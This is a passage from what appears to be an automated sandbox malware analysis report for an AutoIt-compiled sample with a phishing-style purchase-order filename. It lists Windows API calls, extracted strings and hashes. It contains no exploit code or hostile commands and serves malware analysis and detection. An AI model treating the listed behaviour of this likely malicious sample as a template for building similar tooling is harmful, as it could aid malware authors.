                        • Instruction Fuzzy Hash: B4C1057222519349EF1D4A3984B463EFBA05EA17B171A035FD4B3CB2E1EE24CD34D660
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction ID: 57a2d17d6f81a8fc59a34ca82b30e1310663c07e98093b47e06e19d1ffd256c5
                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction Fuzzy Hash: FF41C471D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D734AB41DB40
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: dc09e0c02986b3dc2d2b0f81ec0558c1f1b0439718f7cdee71d17c1c3c10033b
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: D501C078A10208EFCB54DF98C5809AEF7F5FB88214F6485E9D809A7300D734AE41DB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction ID: 8ed6a3062fc6ab27908634b5eb5d195e34e9517ac78e7bf76e69c9bf312ee3b9
                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction Fuzzy Hash: 8501D278A10208EFCB55DF98C5909AEF7F5FB48310F6485E9D809A7301D734AE41CB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 0030A7A5
                        • DeleteObject.GDI32(00000000), ref: 0030A7B7
                        • DestroyWindow.USER32 ref: 0030A7C5
                        • GetDesktopWindow.USER32 ref: 0030A7DF
                        • GetWindowRect.USER32(00000000), ref: 0030A7E6
                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0030A927
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0030A937
                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030A97F
                        • GetClientRect.USER32(00000000,?), ref: 0030A98B
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0030A9C5
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030A9E7
                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030A9FA
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030AA05
                        • GlobalLock.KERNEL32(00000000), ref: 0030AA0E
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030AA1D
                        • GlobalUnlock.KERNEL32(00000000), ref: 0030AA26
                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030AA2D
                        • GlobalFree.KERNEL32(00000000), ref: 0030AA38
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030AA4A
                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0033D9BC,00000000), ref: 0030AA60
                        • GlobalFree.KERNEL32(00000000), ref: 0030AA70
                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0030AA96
                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0030AAB5
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030AAD7
                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030ACC4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 2211948467-2373415609
                        • Opcode ID: 210a80c42174a4fb3064bcd91b43ca7b7c8d6cff7cf4b79634d0ca3c158aaccb
                        • Instruction ID: 5dd052f7cc01d13c7650fcd45820595dc18eeba5f1a1ba2477462d01b6863ce9
                        • Opcode Fuzzy Hash: 210a80c42174a4fb3064bcd91b43ca7b7c8d6cff7cf4b79634d0ca3c158aaccb
                        • Instruction Fuzzy Hash: 44027D71910205EFDB15DFA8EC99EAE7BB9FB48310F108119F915AB2A0D7309D41CB60
                        APIs
                        • SetTextColor.GDI32(?,00000000), ref: 0031D0EB
                        • GetSysColorBrush.USER32(0000000F), ref: 0031D11C
                        • GetSysColor.USER32(0000000F), ref: 0031D128
                        • SetBkColor.GDI32(?,000000FF), ref: 0031D142
                        • SelectObject.GDI32(?,00000000), ref: 0031D151
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0031D17C
                        • GetSysColor.USER32(00000010), ref: 0031D184
                        • CreateSolidBrush.GDI32(00000000), ref: 0031D18B
                        • FrameRect.USER32(?,?,00000000), ref: 0031D19A
                        • DeleteObject.GDI32(00000000), ref: 0031D1A1
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0031D1EC
                        • FillRect.USER32(?,?,00000000), ref: 0031D21E
                        • GetWindowLongW.USER32(?,000000F0), ref: 0031D249
                          • Part of subcall function 0031D385: GetSysColor.USER32(00000012), ref: 0031D3BE
                          • Part of subcall function 0031D385: SetTextColor.GDI32(?,?), ref: 0031D3C2
                          • Part of subcall function 0031D385: GetSysColorBrush.USER32(0000000F), ref: 0031D3D8
                          • Part of subcall function 0031D385: GetSysColor.USER32(0000000F), ref: 0031D3E3
                          • Part of subcall function 0031D385: GetSysColor.USER32(00000011), ref: 0031D400
                          • Part of subcall function 0031D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0031D40E
                          • Part of subcall function 0031D385: SelectObject.GDI32(?,00000000), ref: 0031D41F
                          • Part of subcall function 0031D385: SetBkColor.GDI32(?,00000000), ref: 0031D428
                          • Part of subcall function 0031D385: SelectObject.GDI32(?,?), ref: 0031D435
                          • Part of subcall function 0031D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0031D454
                          • Part of subcall function 0031D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0031D46B
                          • Part of subcall function 0031D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0031D480
                          • Part of subcall function 0031D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0031D4A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                        • String ID:
                        • API String ID: 3521893082-0
                        • Opcode ID: fcf4200d03b04ae28aa5ca502428e418708568c6d8a348540430d7e2ae6a46f5
                        • Instruction ID: 589c508352e60ba605500177526238724894f10f0d1f6482133be0d329f60c8e
                        • Opcode Fuzzy Hash: fcf4200d03b04ae28aa5ca502428e418708568c6d8a348540430d7e2ae6a46f5
                        • Instruction Fuzzy Hash: 81919072408301BFDB129F64EC88E9B7BADFF8A321F100A19F962961E0D775D985CB51
                        APIs
                        • DestroyWindow.USER32 ref: 002B4956
                        • DeleteObject.GDI32(00000000), ref: 002B4998
                        • DeleteObject.GDI32(00000000), ref: 002B49A3
                        • DestroyIcon.USER32(00000000), ref: 002B49AE
                        • DestroyWindow.USER32(00000000), ref: 002B49B9
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0032E179
                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0032E1B2
                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0032E5E0
                          • Part of subcall function 002B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002B4954,00000000), ref: 002B4A23
                        • SendMessageW.USER32 ref: 0032E627
                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0032E63E
                        • ImageList_Destroy.COMCTL32(00000000), ref: 0032E654
                        • ImageList_Destroy.COMCTL32(00000000), ref: 0032E65F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                        • String ID: 0
                        • API String ID: 464785882-4108050209
                        • Opcode ID: a0f132420979ec35f304c83e4f595767f5ddb4d132f3c52cf46f1430e15ea9cc
                        • Instruction ID: 8ab98efb3e97e17ad07663f7619037bbb3efa44e60b41c11b2c449718705009d
                        • Opcode Fuzzy Hash: a0f132420979ec35f304c83e4f595767f5ddb4d132f3c52cf46f1430e15ea9cc
                        • Instruction Fuzzy Hash: AB12D130210622DFDB22EF14E8C6BAABBE4BF05305F154569F59ACB252C731EC55CB91
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 0030A42A
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0030A4E9
                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0030A527
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0030A539
                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0030A57F
                        • GetClientRect.USER32(00000000,?), ref: 0030A58B
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0030A5CF
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0030A5DE
                        • GetStockObject.GDI32(00000011), ref: 0030A5EE
                        • SelectObject.GDI32(00000000,00000000), ref: 0030A5F2
                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0030A602
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0030A60B
                        • DeleteDC.GDI32(00000000), ref: 0030A614
                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0030A642
                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0030A659
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0030A694
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0030A6A8
                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0030A6B9
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0030A6E9
                        • GetStockObject.GDI32(00000011), ref: 0030A6F4
                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0030A6FF
                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0030A709
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: 61ee3ca2602be61e8c91f3bef9f73e5d1ebc724a07e5dcb1afaf88f8e88cb2f4
                        • Instruction ID: e6d5e7aab4ae2a3b61c83fa972881e57d155ea182a0f287caa7718571d4c59a4
                        • Opcode Fuzzy Hash: 61ee3ca2602be61e8c91f3bef9f73e5d1ebc724a07e5dcb1afaf88f8e88cb2f4
                        • Instruction Fuzzy Hash: 74A14B71A10615BFEB15DBA9DC8AFAE7BBDEB04710F108114F615A72E0D7B0AD40CB64
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 002FE45E
                        • GetDriveTypeW.KERNEL32(?,0034DC88,?,\\.\,0034DBF0), ref: 002FE54B
                        • SetErrorMode.KERNEL32(00000000,0034DC88,?,\\.\,0034DBF0), ref: 002FE6B1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                        • API String ID: 2907320926-4222207086
                        • Opcode ID: b7d202df32ebf58fe2950276eabbf68e9a6c3f3d33bb176cffa2f87befbef076
                        • Instruction ID: eaa3a7e612f6067ce5feba29a35f950c91f7a8473a643ad94221e5d8ae7db2de
                        • Opcode Fuzzy Hash: b7d202df32ebf58fe2950276eabbf68e9a6c3f3d33bb176cffa2f87befbef076
                        • Instruction Fuzzy Hash: 7F51C53023430D9BCA02DF14C891CB9F7A5AEA47C8B528939F616DB1B1D6A0DF65DE42
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                        • API String ID: 1038674560-86951937
                        • Opcode ID: adfe954378b1de8e5302b69b596b3ff5872a4d581ae889a74f08d52d4e0ea76f
                        • Instruction ID: f4e317aec30b4a7184945e79242b8c459ced40cdaa846cbcbb1628994c0e9af0
                        • Opcode Fuzzy Hash: adfe954378b1de8e5302b69b596b3ff5872a4d581ae889a74f08d52d4e0ea76f
                        • Instruction Fuzzy Hash: 98612E3166031277DB23BA249C82FFA73ACAF15780F244025FD45AB186EF94DE35DA91
                        APIs
                        • CharUpperBuffW.USER32(?,?,0034DBF0), ref: 00316245
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                        • API String ID: 3964851224-45149045
                        • Opcode ID: 3a87d5d613b3e316506c5f42bcfa848d7b5fc82040c95b18765ada0393342861
                        • Instruction ID: 13c703835782ba67b046702389f33791a2a3f8af3f4ab3a687b3e90644146a89
                        • Opcode Fuzzy Hash: 3a87d5d613b3e316506c5f42bcfa848d7b5fc82040c95b18765ada0393342861
                        • Instruction Fuzzy Hash: D1C1C6342142018BCB09EF54C452BEE7796AF99394F14896CB8925B3E6CF31DD5ACF82
                        APIs
                        • GetSysColor.USER32(00000012), ref: 0031D3BE
                        • SetTextColor.GDI32(?,?), ref: 0031D3C2
                        • GetSysColorBrush.USER32(0000000F), ref: 0031D3D8
                        • GetSysColor.USER32(0000000F), ref: 0031D3E3
                        • CreateSolidBrush.GDI32(?), ref: 0031D3E8
                        • GetSysColor.USER32(00000011), ref: 0031D400
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0031D40E
                        • SelectObject.GDI32(?,00000000), ref: 0031D41F
                        • SetBkColor.GDI32(?,00000000), ref: 0031D428
                        • SelectObject.GDI32(?,?), ref: 0031D435
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0031D454
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0031D46B
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0031D480
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0031D4A8
                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0031D4CF
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0031D4ED
                        • DrawFocusRect.USER32(?,?), ref: 0031D4F8
                        • GetSysColor.USER32(00000011), ref: 0031D506
                        • SetTextColor.GDI32(?,00000000), ref: 0031D50E
                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0031D522
                        • SelectObject.GDI32(?,0031D0B5), ref: 0031D539
                        • DeleteObject.GDI32(?), ref: 0031D544
                        • SelectObject.GDI32(?,?), ref: 0031D54A
                        • DeleteObject.GDI32(?), ref: 0031D54F
                        • SetTextColor.GDI32(?,?), ref: 0031D555
                        • SetBkColor.GDI32(?,?), ref: 0031D55F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1996641542-0
                        • Opcode ID: 458ff96aba961a9fa5558f37cace8fd60493195c933d15d6c023708ab69fdb20
                        • Instruction ID: e3f24f7654ed87d84b2baf37cb27dae1323a65483b809eb6a3f7423791c49c57
                        • Opcode Fuzzy Hash: 458ff96aba961a9fa5558f37cace8fd60493195c933d15d6c023708ab69fdb20
                        • Instruction Fuzzy Hash: 78514C71900208AFDF129FA9EC88EEE7BB9FB09320F214515F925AB2A1D7759940DF50
                        APIs
                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0031B5C0
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0031B5D1
                        • CharNextW.USER32(0000014E), ref: 0031B600
                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0031B641
                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0031B657
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0031B668
                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0031B685
                        • SetWindowTextW.USER32(?,0000014E), ref: 0031B6D7
                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0031B6ED
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 0031B71E
                        • _memset.LIBCMT ref: 0031B743
                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0031B78C
                        • _memset.LIBCMT ref: 0031B7EB
                        • SendMessageW.USER32 ref: 0031B815
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0031B86D
                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0031B91A
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0031B93C
                        • GetMenuItemInfoW.USER32(?), ref: 0031B986
                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0031B9B3
                        • DrawMenuBar.USER32(?), ref: 0031B9C2
                        • SetWindowTextW.USER32(?,0000014E), ref: 0031B9EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                        • String ID: 0
                        • API String ID: 1073566785-4108050209
                        • Opcode ID: 5e7dbd69f7b08e5d30c75214bfae3c3d12d0d3c56d028b871d54289d18c4cc4a
                        • Instruction ID: 0efd35d53503f8a7a207568f7f5bd8655e6eab11c821d88a03f8f542704c1cbe
                        • Opcode Fuzzy Hash: 5e7dbd69f7b08e5d30c75214bfae3c3d12d0d3c56d028b871d54289d18c4cc4a
                        • Instruction Fuzzy Hash: FDE18D71900218ABDF269F55CC85EEEBBBDFF09750F108156F919AB290DB708A81CF60
                        APIs
                        • GetCursorPos.USER32(?), ref: 00317587
                        • GetDesktopWindow.USER32 ref: 0031759C
                        • GetWindowRect.USER32(00000000), ref: 003175A3
                        • GetWindowLongW.USER32(?,000000F0), ref: 00317605
                        • DestroyWindow.USER32(?), ref: 00317631
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0031765A
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00317678
                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0031769E
                        • SendMessageW.USER32(?,00000421,?,?), ref: 003176B3
                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003176C6
                        • IsWindowVisible.USER32(?), ref: 003176E6
                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00317701
                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00317715
                        • GetWindowRect.USER32(?,?), ref: 0031772D
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00317753
                        • GetMonitorInfoW.USER32 ref: 0031776D
                        • CopyRect.USER32(?,?), ref: 00317784
                        • SendMessageW.USER32(?,00000412,00000000), ref: 003177EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
